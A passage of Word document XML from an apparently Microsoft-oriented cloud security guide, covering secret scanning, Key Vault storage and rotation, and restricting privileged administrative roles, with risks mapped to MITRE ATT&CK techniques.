          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Use key vault or a secure key store service to store the credentials and secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F28C90" w14:textId="6C7E8C48" w:rsidR="00835088" w:rsidRPr="00E53977" w:rsidRDefault="00835088" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Scan for credentials in source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3FBE2" w14:textId="49384BC1" w:rsidR="00CD29AE" w:rsidRPr="00E53977" w:rsidRDefault="00CD29AE" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1DAAB44F" w14:textId="334BF73E" w:rsidR="00CD29AE" w:rsidRPr="00E53977" w:rsidRDefault="00CD29AE" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79055289" w14:textId="64240777" w:rsidR="00CD29AE" w:rsidRPr="00E53977" w:rsidRDefault="00CD29AE" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Exposed credentials (e.g., API keys, passwords) in plaintext, code repositories, or logs can be exploited by attackers to gain access to sensitive systems or data. For instance, a leaked Azure service principal key could allow an attacker to access storage accounts or virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D98740B" w14:textId="40C29026" w:rsidR="00CD29AE" w:rsidRPr="00E53977" w:rsidRDefault="00CD29AE" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F68D184" w14:textId="18F08530" w:rsidR="00CD29AE" w:rsidRPr="00E53977" w:rsidRDefault="00CD29AE" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Data Breach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606175A0" w14:textId="49C0D5FB" w:rsidR="00CD29AE" w:rsidRPr="00E53977" w:rsidRDefault="00CD29AE" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5676C865" w14:textId="4145EA57" w:rsidR="005F6C1E" w:rsidRPr="00E53977" w:rsidRDefault="005F6C1E" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604EF139" w14:textId="56EAFA79" w:rsidR="003F5B11" w:rsidRDefault="003F5B11" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA2B8CF" w14:textId="20B95E18" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>Exploitation of exposed credentials, such as API keys or service principal tokens in public repositories or misconfigured storage, enabling attackers to gain unauthorized entry to cloud resources (e.g., T1078 - Valid Accounts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04C79E" w14:textId="6A93B94E" w:rsidR="003F5B11" w:rsidRDefault="003F5B11" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA861D" w14:textId="41872A81" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>Use of stolen, over-privileged secrets to elevate access, allowing attackers to control additional resources or subscriptions (e.g., T1078 - Valid Accounts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0AD76B" w14:textId="7AE71B6D" w:rsidR="003F5B11" w:rsidRDefault="003F5B11" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB053F4" w14:textId="655B08BE" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>Harvesting sensitive data by leveraging exposed database connection strings or storage keys, leading to unauthorized data extraction from cloud resources (e.g., T1530 - Data from Cloud Storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7DE65" w14:textId="0C03CDAA" w:rsidR="003F5B11" w:rsidRDefault="003F5B11" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D731B75" w14:textId="6DEB13B3" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:lastRenderedPageBreak/>
        <w:t>Pivoting across cloud resources using compromised credentials, such as reused tokens or service accounts, to access interconnected systems or virtual networks (e.g., T1021 - Remote Services).</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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement secret detection through the following practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E840D8D" w14:textId="045B8426" w:rsidR="003F5B11" w:rsidRPr="00E53977" w:rsidRDefault="003F5B11" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable Azure DevOps secret scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B56D98B" w14:textId="1DC149F3" w:rsidR="003F5B11" w:rsidRPr="00E53977" w:rsidRDefault="003F5B11" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>If you use Azure DevOps for code management, implement Azure DevOps Credential Scanner to identify credentials within code repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213B965F" w14:textId="77A832A8" w:rsidR="003F5B11" w:rsidRPr="00E53977" w:rsidRDefault="003F5B11" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable GitHub secret scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C19DA54" w14:textId="212AEAAA" w:rsidR="003F5B11" w:rsidRPr="00E53977" w:rsidRDefault="003F5B11" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>For GitHub repositories, use the native secret scanning feature to identify credentials or other forms of secrets within code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C0AAA" w14:textId="0A0BFBCC" w:rsidR="003F5B11" w:rsidRPr="00E53977" w:rsidRDefault="003F5B11" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy agentless secrets scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B57869" w14:textId="56014632" w:rsidR="003F5B11" w:rsidRPr="00E53977" w:rsidRDefault="003F5B11" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable Microsoft Defender for Cloud for agentless secrets scanning on VMs, storage, and multi-cloud instances to detect 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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Protect secrets and credentials using the following practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43350DA5" w14:textId="3135817F" w:rsidR="00CA303B" w:rsidRPr="00E53977" w:rsidRDefault="00CA303B" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Store secrets in Azure Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6382CC" w14:textId="17780DAD" w:rsidR="00CA303B" w:rsidRPr="00E53977" w:rsidRDefault="00CA303B" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement automatic secret rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB85F3" w14:textId="626B91F0" w:rsidR="00CA303B" w:rsidRPr="00E53977" w:rsidRDefault="00CA303B" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Access Key Vault via managed identities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF96B59" w14:textId="25A44242" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00CA303B" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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6" w:name="_Toc242449489"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Privileged Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="25B65239" w14:textId="71E9087E" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="00157068">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc242449490"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Secure access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="22B07D4B" w14:textId="212B8D98" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="00157068">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc242449491"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>PA-1: Separate and limit highly privileged/administrative users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="21AAD73E" w14:textId="33D3B5D3" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA9E2B3" w14:textId="4AAE4DD7" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Identify all </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>high business</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DB79C36" w14:textId="0115A053" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized access from over-privileged accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008A2AE" w14:textId="19747093" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Adversaries exploit highly privileged accounts with excessive permissions to gain unauthorized access to critical cloud resources, such as management consoles, APIs, or sensitive data stores. Without separation, a single compromised admin account can provide attackers with unrestricted access to modify IAM policies, deploy malicious workloads, or exfiltrate data across an entire tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4984BB9B" w14:textId="1492F2CA" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege escalation via compromised administrative credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E04E2" w14:textId="1A387A14" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>Attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Persistent access from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>stale</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> or unmonitored privileged accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31171C29" w14:textId="1E2A4DF6" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F26D5" w14:textId="43D40ADE" w:rsidR="00157068" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012005C" w14:textId="27FF22C4" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t xml:space="preserve">Valid Accounts: Cloud Accounts (T1078.004): Compromising highly privileged accounts to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50663">
        <w:t>authenticate to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50663">
        <w:t xml:space="preserve"> cloud consoles or APIs, accessing critical resources using stolen admin credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05A2EB" w14:textId="0ACB1F7E" w:rsidR="00157068" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC953BC" w14:textId="321AE95D" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t xml:space="preserve">Abuse Elevation Control Mechanism: Cloud Infrastructure (T1548.005): Exploiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D50663">
        <w:t>unscoped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D50663">
        <w:t xml:space="preserve"> privileged accounts to escalate access by modifying IAM policies, gaining tenant-wide control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A648D" w14:textId="34067564" w:rsidR="00157068" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F84085" w14:textId="7745E041" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>Account Manipulation: Additional Cloud Roles (T1098.001): Altering privileged accounts to add persistent roles, maintaining long-term access to cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB7F40" w14:textId="06D6FD9F" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="00157068">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PA-1.1: Restrict and limit highly privileged/administrative users in Microsoft Entra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023F211" w14:textId="0725F6E8" w:rsidR="00375DD3" w:rsidRPr="00E53977" w:rsidRDefault="00375DD3" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement the following restrictions for cloud identity administrative roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A4E092" w14:textId="77751596" w:rsidR="00375DD3" w:rsidRPr="00E53977" w:rsidRDefault="00375DD3" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Identify critical built-in roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A3EAAF" w14:textId="24E4B549" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Evaluate custom role permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715E639" w14:textId="7447DE6F" w:rsidR="006078E0" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Review custom roles in your identity management system for privileged permissions that need to be governed based on your business needs, applying the same restrictions as built-in privileged roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B9BA7" w14:textId="000C3B65" w:rsidR="00157068" w:rsidRPr="00E53977" w:rsidRDefault="00157068" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Extend restrictions beyond cloud identity systems</w:t>
      </w:r>
    </w:p>
